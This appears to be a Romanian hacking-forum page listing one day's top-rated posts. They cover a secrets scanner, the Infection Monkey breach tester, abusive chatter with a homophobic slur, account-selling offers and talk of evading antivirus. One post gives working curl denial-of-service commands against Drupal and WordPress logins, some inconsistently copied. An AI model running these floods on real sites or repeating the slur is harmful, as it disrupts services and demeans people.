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Showing content with the highest reputation on 05/25/18 in all areas

  1. salut, puteti limita cumva? i-am dat downvote faggotului de @dpul pt ca facea spam pt postari sa ajunga la market si a inceput sa isi faca conturi sa imi dea la toate postarile. alte exemple de utilizatori "atacati" cu downvote : https://rstforums.com/forum/profile/60415-yoyois/ https://rstforums.com/forum/profile/222485-kronzy94/
    3 points
  2. The detection of faked identities is a major problem in security. Current memory-detection techniques cannot be used as they require prior knowledge of the respondent’s true identity. Here, we report a novel technique for detecting faked identities based on the use of unexpected questions that may be used to check the respondent identity without any prior autobiographical information. While truth-tellers respond automatically to unexpected questions, liars have to “build” and verify their responses. This lack of automaticity is reflected in the mouse movements used to record the responses as well as in the number of errors. Responses to unexpected questions are compared to responses to expected and control questions (i.e., questions to which a liar also must respond truthfully). Parameters that encode mouse movement were analyzed using machine learning classifiers and the results indicate that the mouse trajectories and errors on unexpected questions efficiently distinguish liars from truth-tellers. Furthermore, we showed that liars may be identified also when they are responding truthfully. Unexpected questions combined with the analysis of mouse movement may efficiently spot participants with faked identities without the need for any prior information on the examinee. O mica parte. Restul cititi aici.
    2 points
  3. snallygaster is a Python-based tool that can help you to scan for secret files on HTTP servers, files that are accessible that shouldn’t be public and can pose a security risk. Typical examples include publicly accessible git repositories, backup files potentially containing passwords or database dumps. In addition it contains a few checks for other security vulnerabilities. snallygaster HTTP Secret File Scanner Features This is an overview of the tests provided by snallygaster. lfm_php – Checks for Lazy File Manager idea – Config file for JetBrains symphony_databases_yml – Symphony database config file rails_database_yml – Ruby on Rails default config file git_dir – Download the full Git repo svn_dir – Download the full SVN repo cvs_dir – Download the full CVS repo apache_server_status – Apache server-status page coredump – Memory dump file on Linux sftp_config – Configuration file from sublime FTP client wsftp_ini – Configuration file for WS_FTP filezilla_xml – Configuration file for FileZilla winscp_ini – Configuration file for WinSCP ds_store – Apple OS X File Manager backupfiles – Backup files and other leftovers from editors deadjoe – JOE editor dump file sql_dump – Checks for common names of SQL database dumps bitcoin_wallet – Scans for Bitcoin wallet files drupal_backup_migrate – Drupal migration backup magento_config – Magento XML based config file xaa – Output of the Linux split command optionsbleed – Checks for Optionsbleed vuln privatekey – Checks for private keys sshkey – Looks for SSH private keys dotenv – Looks for Laravel .env files invalidsrc – Checks webpage source for all inaccessible references ilias_defaultpw – Checks for the Ilias e-learning software default creds cgiecho – Leaks files from cgiemail phpunit_eval – Test for remote code execution axfr – Checks for DNS AXFR zone transfer requests You could probably achieve something similar with Burp Intruder or Patator and something like the quickhits list from SecLists. Download: snallygaster-master.zip Source
    1 point
  4. Infection Monkey Data center Security Testing Tool Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. The Infection Monkey is comprised of two parts: Monkey - A tool which infects other machines and propagates to them Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. Multiple propagation techniques: Predefined passwords Common logical exploits Password stealing using Mimikatz Multiple exploit methods: SSH SMB RDP WMI Shellshock Conficker SambaCry Elastic Search (CVE-2015-1427) Setup Check out the Setup page in the Wiki or a quick getting started guide. Building the Monkey from source If you want to build the monkey from source, see Setup and follow the instructions at the readme files under infection_monkey and monkey_island. Download: monkey-develop.zip or: git clone https://github.com/guardicore/monkey.git Source
    1 point
  5. Drupal Denial of Service CVE-2014-9016 Generate a pyaload and try with a non-valid user: $ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload $ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null & Generate a pyaload and try with a valid user: $ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload $ time curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null & Perform a Dos with a valid user: $ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done Wordpress Denial of Service CVE-2014-9034 Generate a pyaload and try with a non-valid user: $ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload $ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null & Generate a pyaload and try with a valid user: $ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload $ time curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null & Perform a Dos with a valid user: $ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done Python Code https://github.com/c0r3dump3d/wp_drupal_timing_attack References Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console https://wordpress.org/news/2014/11/wordpress-4-0-1/ https://www.drupal.org/SA-CORE-2014-006 https://www.drupal.org/node/2378367 NVD - Detail NVD - Detail Source : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep
    1 point
  6. Salut ma numesc Cristi am 15 ani si am intrat aici mai mult pt ca sunt pasionat de csgo si doresc sa invat ceva pt a face rost de skinuri in acel joc. Exista niste site`uri de bet in acest sens dar mai greu de a "imprumuta " acele skin`uri.
    -1 points
  7. haha mai bine bag 5000 euro in btc decat sa pun ca bate fcsb :))))
    -1 points
  8. nicehash ? dupa ce au fost hackeriti ?
    -1 points
  9. metoda de plata ? iti dau cash 5000 ron daca ceri btc esti scammer pt ca e prea ieftin LE : era deja in gunoi sry =]
    -1 points
  10. salut. ma intereseaza si pe mine un cont
    -1 points
  11. l-ai tinut o luna, era frig si gazu scump? ai zis sa te incalzesti nitel
    -1 points
  12. vrei sa minezi cu procesoru sau cu gpu? sau cu ambele. da-mi un pm si poate te ajut, vreau 15 % fata de minergate care iti ia vreo 10
    -1 points
  13. 1d5abfc7c3677dfe1f3bee96dd16763f 91e0bcf1e4dcb62103fe4c4470349514 d05f65815a4c7214f1eca37c9b29b61a
    -1 points
  14. vezi pm mai am inca 3 pt 3 persoane care imi trimit pm, sa fiti si voi mai vechi si cu putina activitate. poate nu e corect sa le postez sa aiba noroc plebii cu cont de 2 zile
    -1 points
  15. am eu cont, ti-l dau cu tot cu mail. sa vad insa daca pot obtine invitatie. ce pret oferi?
    -1 points
  16. Bullshit. Tipul asta nu intelege ce e bitcoin si nu are habar de tehnologia din spatele monedei. 1. Tranzactiile bitcoin costa mult prea mult (6$) si necesita prea multa putere de calcul. Bitcoin(si celelalte monede) trebuie sa se schimbe ca sa poata creste. 2. Da, pretul monedelor fluctueaza prea tare. E o piata foarte speculativa. Cine investeste in criptomonede risca sa piarda multi bani. 3. Bitcoin are valoare intrinsica! Valoarea bitcoinului este mai masurabila si mai tangibila decat aurul. Bitcoin apare ca PROOF of WORK! Adica e o munca depusa pentru fiecare BTC. Nu apar bani din aer. 4. Marimea blockchainului e alta problema pe langa tranzactii/secunda care trebuie adresata. Daca se gasesc solutii la problemele astea BTC are un viitor bun. Bitcon e ce e. Toate modedele din lume, si $ € £ sunt folosite de criminali si mereu o sa existe crime. Ca exemplu furtul de carduri nu a condus la disparitia cardului. Toata ideea criptomonedelor e sa nu fie controlate de guvern. Deci de ce ne plangem ca nu sunt controlate de guvern?!? Da BTC are probleme dar are si valoare la fel ca orice modeda($ € £). Pretul de trade e umflat si speculat dar in timp o sa se stabilizeze usor la o valoare constanta.
    -1 points
  17. Un alt punct de vedere asupra economiei actuale si de unde apate profitul. @Gecko doar ca referinta, autorii nu pretind ca ce spun ei e verificat.
    -1 points
  18. Dar daca ai pune mana sa inveti ce se spune la curs nu ar fi mai bine? Vrei sa-ti faca altul temele si tu cu sa ai diploma fara sa stii ce e ala "RX TX". Nu toata lumea trebuie sa aiba licenta, poate te orientezi pe alt subiect unde mai intelegi cate ceva. Cum plm iti faci licenta in arduino SPI radio-spectrum cand tu nu stii ce e un ledPin, RX, TX? Plm viitorul tarii.
    -1 points
  19. Bai pula, cand iti iei BAN futuz pizda ta? https://www.virustotal.com/#/file/ff0096934d08baef0ab9d25b5866744139acc91e3a523833c9f0aab659f1d72c/detection (3/65 trojan) https://www.hybrid-analysis.com/sample/ff0096934d08baef0ab9d25b5866744139acc91e3a523833c9f0aab659f1d72c E deja al 2lea trojan. Uite aici https://www.hybrid-analysis.com/sample/9264ff9bc79c62f0b92014f32e32120b79452f05b330cc3e8180b098fa466339/5ad70f4b7ca3e108f17eee73 Threat Score: 66/100 AV Detection: Yes
    -1 points
  20. Hai pune sursa pe un https://github.com Fa un repo frumos si lasa lumea sa compileze direct de acolo. Doar nu ai niciun secret in sursa. Tot doreai sa oferi un API public sa-si faca oricine aplicatie. Atunci hai valea de pe forum. Te mai freci atata dupa ce ai fost prins.
    -1 points
  21. -1 points
  22. Tu esti, Terex? 😂 Nu prea mai merge ca in 2012 cu cryper fud. Tehnicile anti-av pe care le mai gasesti sunt scumpe si complicate. Crypterele facute in Visual Basic nu mai tin mai mult de 2 luni. S-au smecherit AVurile, cu heuristici, machine learning, plm
    -1 points
  23. vreau si eu asta pls https://www.scribd.com/doc/44058308/Sartre-Jean-Paul-Greata
    -1 points
  24. Avem categorie dedicata pt schizofrenici https://rstforums.com/forum/forum/19-cosul-de-gunoi/
    -1 points
  25. Uite unde era desteptul. Tu nici nu intelegi de ce e vina ta ca esti prost. Cum ai spus si tu ai stat 3-4 ani in facultate fara sa intelegi nici macar un cuvant din informatica si acum te trezesti cu diploma in informatica. Se umple tara de destepti ca tine cu diploma care nu stiu cum sa scrie o linie de cod. Si e tot vina mea ca eu nu te-am invatat cum sa-ti faci treba? Dar tu in aia 4 ani de facultate nu te-ai gandit: "bai pula eu nu stiu nimic? oare sa pun mana pe o carte sa citesc ceva? eu doar astept sa-mi dea profesorii/colegii mura-n gura?" Hai jet ca si eu sunt student si invat cate 50 de pagini pe luna. Daca vrei se poate! Daca nu vrei te plangi ca nu ti-a dat nimeni oportunitatea.
    -1 points
  26. Cat spam poti sa faci omule? Iti trebuie 50 pentru market, inteleg dar du-te in https://rstforums.com/forum/forum/19-cosul-de-gunoi/ si lasa-ne in pace.
    -1 points
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